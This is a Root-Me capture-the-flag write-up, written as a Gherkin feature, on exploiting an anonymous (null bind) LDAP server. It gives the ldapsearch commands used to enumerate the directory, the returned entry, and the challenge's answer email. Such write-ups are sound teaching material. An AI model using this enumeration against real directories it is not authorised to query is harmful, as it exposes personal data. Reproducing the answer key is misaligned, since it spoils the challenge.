## Version 2.0
## language: en

Feature: Network-Root Me
  Site:
    www.root-me.org
  Category:
    Network
  User:
    yamuz0
  Goal:
    Find an e-mail address from a created branch at dn by someone of anonymous

  Background:
  Hacker's software:
    | <Software name> | <Version>                 |
    | Ubuntu          | 16.04.5 LTS (amd64)       |
    | Chromium        | 66.0.3359.139             |
    | OpenLDAP        | 2.4.42                    |
    | Gnome Terminal  | 3.18.3                    |
  Machine information:
    Given the challenge webpage tells the Server is challenge01.root-me.org
    And the port to be used for LDAP is 54013
    And the Goal is somewhere at dn: dc=challenge01,dc=root-me,dc=org
    And this is a null bind vulnerability so I can acces anonymously
    Then I only need to know the Branch that someone of the anonymous created

  Scenario: Fail:getting ous - SASL authentication
    When I tried to get the ous (organizationalUnit) present at the dn by doing
    """
    ldapsearch -H ldap://challenge01.root-me.org:54013 -b dc=challenge01,dc=root
    -me,dc=org "(ou=*)"
    """
    Then I got a SASL password authentication requirement
    And I could not find the e-mail address

  Scenario: Fail:getting ous - simple authentication
    When I tried to get access not by using SASL authentication but a simple one
    """
    ldapsearch -H ldap://challenge01.root-me.org:54013 -x -b dc=challenge01,dc=r
    oot-me,dc=org "(ou=*)"
    """
    Then I got a 50 error code which means "Insufficient access"
    And I could not find the e-mail address

  Scenario: Success:guessing ou
    When I realized that a way to know the ou would be guessing it
    And due I knew that someone from anonymous created the branch
    Then I guessed ou=anonymous and executed
    """
    ldapsearch -H ldap://challenge01.root-me.org:54013 -x -b ou=anonymous,dc=cha
    llenge01,dc=root-me,dc=org
    """
    And that gave me the answer
    """
    # sabu, anonymous, challenge01.root-me.org
    dn: uid=sabu,ou=anonymous,dc=challenge01,dc=root-me,dc=org
    objectClass: inetOrgPerson
    objectClass: shadowAccount
    uid: sabu
    sn: sabu
    cn: sabu
    givenName: sabu
    mail: sabu@anonops.org
    """
    Then I knew the mail was sabu@anonops.org
    And entered the found mail as solution on the webpage challenge
    And I solved the challenge
